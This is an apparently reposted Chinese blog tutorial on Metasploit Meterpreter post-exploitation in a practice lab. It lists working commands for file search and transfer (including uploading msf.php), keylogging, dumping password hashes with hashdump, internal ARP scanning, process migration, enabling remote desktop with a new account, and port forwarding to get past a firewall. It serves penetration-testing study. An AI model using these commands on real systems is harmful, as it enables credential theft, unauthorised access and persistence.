metasploit后渗透之基础知识

metasploit后渗透之基础知识,第1张

metasploit后渗透之基础知识

文中主要讲解kali中metasploit的用法,通常我们简称MSF,通过学习了解MSF的各种命令小技巧,从而掌握后渗透技术。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

MSF后渗透知识 文件搜索

当我们获取了session,在meterpreter中还可以做哪些 *** 作呢?

sysinfo #查看系统信息
screenshot #屏幕截图
search -d c: -f *.exe #文件搜索


将C盘下面所有的exe文件搜索出来。

文件上传&下载
pwd #查看当前目录
download C:Userstesthash.txt hash.txt #文件下载
getlwd #查看目标机的当面目录
upload /var/www/msf.php msf.php #文件上传

run post/windows/capture/keylog_recorder #键盘记录

这里就可以将你键盘输入的内容进行记录,当然复制粘贴的无法记录。

run模块初识

在meterpreter里面run 具有很多模块可以进行:

扫描内网

内网发现:

run arp_scanner -r 10.10.10.0/24


同样可以使用命令进入cmd:

shell #命令行
chcp 65001 #修改编码 ,避免乱码格式
arp -a # 内网主机发现

HASH导出&进程迁移
hashdump #导出hash
ps #查看进程,这里面我们就可以看到都有哪些权限的User运行了哪些进程。
migrate PID号 #迁移进程

从这里我们可以看出这是个域环境。

进程迁移:

访问远程端口

开启远程桌面:

run getgui -e #


这里就已经将远程桌面已打开,我们只需利用这个命令创建一个账号,便可登陆:

run getgui -p QWEasd123 -u Long #建立账号,但这样建立账号并没有加入用户组,所以一般使用shell里面去建立。


但如果目标机开启了防火墙,那么就算远程桌面开启的,我们同样无法进行连接:

端口转发

那我们就需要利用端口转发的技术,来将远程端口给转发出来:

netstat #来查看远程桌面是否开启:这里如果远程端口被修改,我们同样是可以利用命令来进行查看:
tasklist /svc | find "TermService" #进入shell,查看远程桌面服务的PID
netstat -ano | find "PID号" #利用PID号来查看远程桌面的端口号



将端口转发至本地1234端口:

portfwd add -l 1234 -p 3389 -r 10.10.10.158 #-r 就是填写被攻击机
rdesktop 127.0.0.1:1234 #连接本地1234端口

这样就让被攻击机主动来请求我们的攻击机,从而绕过防火墙限制:

portfwd list #查看添加的条目

本地回连

使用本地1234端口成功连接被攻击机远程桌面:

同样可以使用命令进行清除:

portfwd flush #进行清除
help portfwd #这是可以进行查看有哪些命令

欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/zaji/5714805.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-17
下一篇 2022-12-17

发表评论

登录后才能评论

评论列表(0条)

保存